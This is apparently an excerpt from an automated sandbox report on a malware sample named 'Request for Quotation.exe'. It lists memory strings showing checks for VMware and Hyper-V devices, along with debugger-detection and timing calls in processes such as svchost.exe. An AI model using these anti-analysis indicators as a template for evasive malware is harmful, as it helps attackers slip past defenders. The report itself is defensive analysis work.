          Source: SensorDataService.exe, 00000010.00000003.1788254386.00000000004D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0fMSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: SensorDataService.exe, 00000010.00000003.1788228338.00000000004BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.dMicrosoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counterd35-4ccf-5552-bfa5\
          Source: Spectrum.exe, 00000012.00000002.2951679671.00000000005E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
          Source: Spectrum.exe, 00000012.00000003.1798128019.0000000000640000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795498403.0000000000641000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795594778.0000000000642000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
          Source: Request for Quotation.exe, 00000000.00000003.1761555251.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1767496014.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1747429848.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1749064184.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1760305746.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: SensorDataService.exe, 00000010.00000003.1788035667.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795083876.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
          Source: AppVClient.exe, 00000006.00000002.1734357091.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000006.00000003.1724790940.00000000005D7000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000006.00000003.1724669474.00000000005D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
          Source: Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: Spectrum.exe, 00000012.00000002.2951679671.000000000061D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000F
          Source: Spectrum.exe, 00000012.00000003.1797930073.0000000000644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicen]d
          Source: Request for Quotation.exe, 00000000.00000003.1734763618.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1733339557.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1724729265.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1732896994.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1724313996.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1734043655.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1740158447.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1729023921.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1730420404.0000000000E80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: SensorDataService.exe, 00000010.00000003.1788035667.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795083876.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
          Source: Spectrum.exe, 00000012.00000003.1795498403.0000000000641000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795594778.0000000000642000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter,/d
          Source: Spectrum.exe, 00000012.00000002.2951679671.000000000061D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation CounterL
          Source: SensorDataService.exe, 00000010.00000003.1788228338.00000000004BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverTM)2 CPU 6600 @ 2.
          Source: Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
          Source: Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
          Source: Spectrum.exe, 00000012.00000003.1798032760.000000000064C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dVMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
          Source: SensorDataService.exe, 00000010.00000003.1788254386.00000000004D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0}MSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
          Source: Spectrum.exe, 00000012.00000003.1797930073.0000000000644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Request for Quotation.exe, 00000000.00000003.1705224809.0000000000D04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe`p
          Source: Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
          Source: Spectrum.exe, 00000012.00000002.2951679671.000000000061D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD002
          Source: Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AD1C0 rdtsc 19_2_035AD1C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00417B23 LdrLoadDll,19_2_00417B23
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_007A1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_007A1361
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00761130 mov eax, dword ptr fs:[00000030h]14_2_00761130
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_007A3F3D mov eax, dword ptr fs:[00000030h]14_2_007A3F3D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529353 mov eax, dword ptr fs:[00000030h]19_2_03529353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529353 mov eax, dword ptr fs:[00000030h]19_2_03529353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov eax, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov eax, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov eax, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov ecx, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov eax, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov eax, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FA352 mov eax, dword ptr fs:[00000030h]19_2_035FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352D34C mov eax, dword ptr fs:[00000030h]19_2_0352D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352D34C mov eax, dword ptr fs:[00000030h]19_2_0352D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03605341 mov eax, dword ptr fs:[00000030h]19_2_03605341
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035D437C mov eax, dword ptr fs:[00000030h]19_2_035D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03537370 mov eax, dword ptr fs:[00000030h]19_2_03537370
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03537370 mov eax, dword ptr fs:[00000030h]19_2_03537370
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03537370 mov eax, dword ptr fs:[00000030h]19_2_03537370
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EF367 mov eax, dword ptr fs:[00000030h]19_2_035EF367
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352C310 mov ecx, dword ptr fs:[00000030h]19_2_0352C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03550310 mov ecx, dword ptr fs:[00000030h]19_2_03550310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B930B mov eax, dword ptr fs:[00000030h]19_2_035B930B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B930B mov eax, dword ptr fs:[00000030h]19_2_035B930B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B930B mov eax, dword ptr fs:[00000030h]19_2_035B930B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356A30B mov eax, dword ptr fs:[00000030h]19_2_0356A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356A30B mov eax, dword ptr fs:[00000030h]19_2_0356A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356A30B mov eax, dword ptr fs:[00000030h]19_2_0356A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03527330 mov eax, dword ptr fs:[00000030h]19_2_03527330
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F132D mov eax, dword ptr fs:[00000030h]19_2_035F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F132D mov eax, dword ptr fs:[00000030h]19_2_035F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355F32A mov eax, dword ptr fs:[00000030h]19_2_0355F32A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EB3D0 mov ecx, dword ptr fs:[00000030h]19_2_035EB3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EC3CD mov eax, dword ptr fs:[00000030h]19_2_035EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035383C0 mov eax, dword ptr fs:[00000030h]19_2_035383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035383C0 mov eax, dword ptr fs:[00000030h]19_2_035383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035383C0 mov eax, dword ptr fs:[00000030h]19_2_035383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035383C0 mov eax, dword ptr fs:[00000030h]19_2_035383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036053FC mov eax, dword ptr fs:[00000030h]19_2_036053FC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E3F0 mov eax, dword ptr fs:[00000030h]19_2_0354E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E3F0 mov eax, dword ptr fs:[00000030h]19_2_0354E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E3F0 mov eax, dword ptr fs:[00000030h]19_2_0354E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035663FF mov eax, dword ptr fs:[00000030h]19_2_035663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EF3E6 mov eax, dword ptr fs:[00000030h]19_2_035EF3E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0358739A mov eax, dword ptr fs:[00000030h]19_2_0358739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0358739A mov eax, dword ptr fs:[00000030h]19_2_0358739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03528397 mov eax, dword ptr fs:[00000030h]19_2_03528397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03528397 mov eax, dword ptr fs:[00000030h]19_2_03528397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03528397 mov eax, dword ptr fs:[00000030h]19_2_03528397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352E388 mov eax, dword ptr fs:[00000030h]19_2_0352E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352E388 mov eax, dword ptr fs:[00000030h]19_2_0352E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352E388 mov eax, dword ptr fs:[00000030h]19_2_0352E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355438F mov eax, dword ptr fs:[00000030h]19_2_0355438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355438F mov eax, dword ptr fs:[00000030h]19_2_0355438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035533A5 mov eax, dword ptr fs:[00000030h]19_2_035533A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035633A0 mov eax, dword ptr fs:[00000030h]19_2_035633A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035633A0 mov eax, dword ptr fs:[00000030h]19_2_035633A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360539D mov eax, dword ptr fs:[00000030h]19_2_0360539D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352A250 mov eax, dword ptr fs:[00000030h]19_2_0352A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EB256 mov eax, dword ptr fs:[00000030h]19_2_035EB256
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EB256 mov eax, dword ptr fs:[00000030h]19_2_035EB256
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03536259 mov eax, dword ptr fs:[00000030h]19_2_03536259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529240 mov eax, dword ptr fs:[00000030h]19_2_03529240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529240 mov eax, dword ptr fs:[00000030h]19_2_03529240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356724D mov eax, dword ptr fs:[00000030h]19_2_0356724D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03559274 mov eax, dword ptr fs:[00000030h]19_2_03559274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03571270 mov eax, dword ptr fs:[00000030h]19_2_03571270
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03571270 mov eax, dword ptr fs:[00000030h]19_2_03571270
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03534260 mov eax, dword ptr fs:[00000030h]19_2_03534260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03534260 mov eax, dword ptr fs:[00000030h]19_2_03534260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03534260 mov eax, dword ptr fs:[00000030h]19_2_03534260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FD26B mov eax, dword ptr fs:[00000030h]19_2_035FD26B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FD26B mov eax, dword ptr fs:[00000030h]19_2_035FD26B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352826B mov eax, dword ptr fs:[00000030h]19_2_0352826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03605227 mov eax, dword ptr fs:[00000030h]19_2_03605227
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03567208 mov eax, dword ptr fs:[00000030h]19_2_03567208
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03567208 mov eax, dword ptr fs:[00000030h]19_2_03567208
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352823B mov eax, dword ptr fs:[00000030h]19_2_0352823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B2D3 mov eax, dword ptr fs:[00000030h]19_2_0352B2D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B2D3 mov eax, dword ptr fs:[00000030h]19_2_0352B2D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B2D3 mov eax, dword ptr fs:[00000030h]19_2_0352B2D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036052E2 mov eax, dword ptr fs:[00000030h]19_2_036052E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355F2D0 mov eax, dword ptr fs:[00000030h]19_2_0355F2D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355F2D0 mov eax, dword ptr fs:[00000030h]19_2_0355F2D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A2C3 mov eax, dword ptr fs:[00000030h]19_2_0353A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A2C3 mov eax, dword ptr fs:[00000030h]19_2_0353A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A2C3 mov eax, dword ptr fs:[00000030h]19_2_0353A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A2C3 mov eax, dword ptr fs:[00000030h]19_2_0353A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A2C3 mov eax, dword ptr fs:[00000030h]19_2_0353A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035392C5 mov eax, dword ptr fs:[00000030h]19_2_035392C5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035392C5 mov eax, dword ptr fs:[00000030h]19_2_035392C5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EF2F8 mov eax, dword ptr fs:[00000030h]19_2_035EF2F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035292FF mov eax, dword ptr fs:[00000030h]19_2_035292FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035402E1 mov eax, dword ptr fs:[00000030h]19_2_035402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035402E1 mov eax, dword ptr fs:[00000030h]19_2_035402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035402E1 mov eax, dword ptr fs:[00000030h]19_2_035402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356329E mov eax, dword ptr fs:[00000030h]19_2_0356329E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356329E mov eax, dword ptr fs:[00000030h]19_2_0356329E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356E284 mov eax, dword ptr fs:[00000030h]19_2_0356E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356E284 mov eax, dword ptr fs:[00000030h]19_2_0356E284
